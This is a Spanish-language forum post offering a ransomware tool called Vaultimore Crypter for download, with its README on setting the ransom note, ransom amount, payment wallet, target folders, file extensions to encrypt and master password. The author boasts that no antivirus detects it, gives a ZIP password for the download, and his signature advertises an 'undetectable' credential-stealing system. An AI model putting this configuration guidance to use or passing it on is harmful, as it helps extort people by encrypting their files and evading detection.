Vaultimore Crypter 1.1 # Especie de "Ransomware"

Iniciado por JoxM, Junio 20, 2018, 11:49:00 AM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Junio 20, 2018, 11:49:00 AM Ultima modificación: Agosto 28, 2018, 08:12:41 AM por JoxM
Buenas amigos.

Voy a dejar por aquí un pequeño sistema que trabaja como un ransomware "algo más liviano". Digo esto por que no va a infectarse toda una red, ni enviar por email ni nada de eso. Explico.

Es un programita que cuando se ejecuta, encripta los archivos que haya encontrado en el directorio indicado previamente. La búsqueda es recursiva y puedes buscar por varias extensiones a la vez.

El programa no tiene interfaz, sólo se ve por unos segundos un pequeño cuadro negro en la parte inferior derecha del monitor. Cuando termina se cierra el proceso.

Dejo algunas capturas y voy a pegar aquí el README en inglés que he creado para indicar un poco su uso.





Código: php

Vaultimore.exe -> Crypter. CAUTION! Only need execute to run!

VaultimoreDEC.exe -> Decrypter. CAUTION Need params.ini with same config to encryption for decrypt.


## CONFIGURATION ##
.......................
It is only necessary to configure the parameters that are at the beginning of this file. Change the values after the = sign.
......................
msg1 -> Message explaining what happened. You can write whatever you want.
......................
ammount -> Rescue money. Includes the currency code.
......................
walletaddress -> It is where you can establish the address where they will make the payment.
......................
pathtosearch -> Directory where it will search the files to be encrypted. The search includes all subdirectories. You can set parameters like these:

C:/Users/::username::/...

In this case, the username variable will refer to the user name of the machine. These variables are always established between :: and ::.

The available ones are:

::username:: The name of the Windows User
::documents:: Documents directory (example usage: ::documents::/anyfolder/) Is equal to C:\Users\JOSE\Documents\anyfolder
::programfiles:: Program files directory (example usage: ::programfiles::/Adobe/) Is equal to c:\program files\adobe\
.......................
extensionstoencrypt -> Sets the extensions of the file types to be encrypted. (Example: *.txt;*.mdb;*.csv)
.......................
cryptextension -> Extension for crypt files with any word extension. (Example: .criptin)
.......................
cryptpass - > Master password to encryption. IMPORTANT!!! This same password is necessary to decrypt the files again.
.......................
deleteparams ->  1 = Delete params.ini after execution. 0 = NO delete params.ini after execution. CAUTION Need params.ini with same config to encryption for decrypt.


Como véis es bastante configurable. Por defecto y como máximo puede buscar archivos extensiones de hasta 4 caracteres de largo para su posterior encriptación. Si por ejemplo la variable pathtosearch la configuras como:

pathtosearch=C:/

Va a demorarse más en sacar todos los archivos con las extensiones indicadas que si la estableces en esto:

pathtosearch=::documents::

Qué sólo buscará en la carpeta de Mis Documentos.

No lo detecta ningún antivirus, en Virustotal hay 2 falsos positivos por que no tiene nada que ver lo que "detecta" con lo que "debería detectar"

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Me gustaría tener opiniones de qué tal el funcionamiento. Por el momento no voy a compartir el código ya que el sistema que uso para programar es anticuado pero nadie le saca tanto partido como yo :).

Dejaré el enlace activo sólo unos días.

NUEVO LINK ACTUALIZADO ZIPPYSHARE
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

ZIP PASS: 1122A

Un saludo a tod@s!
Sistema indetectable para obtener credenciales. Contacta conmigo y te hago una demo.


Link updated!
Sistema indetectable para obtener credenciales. Contacta conmigo y te hago una demo.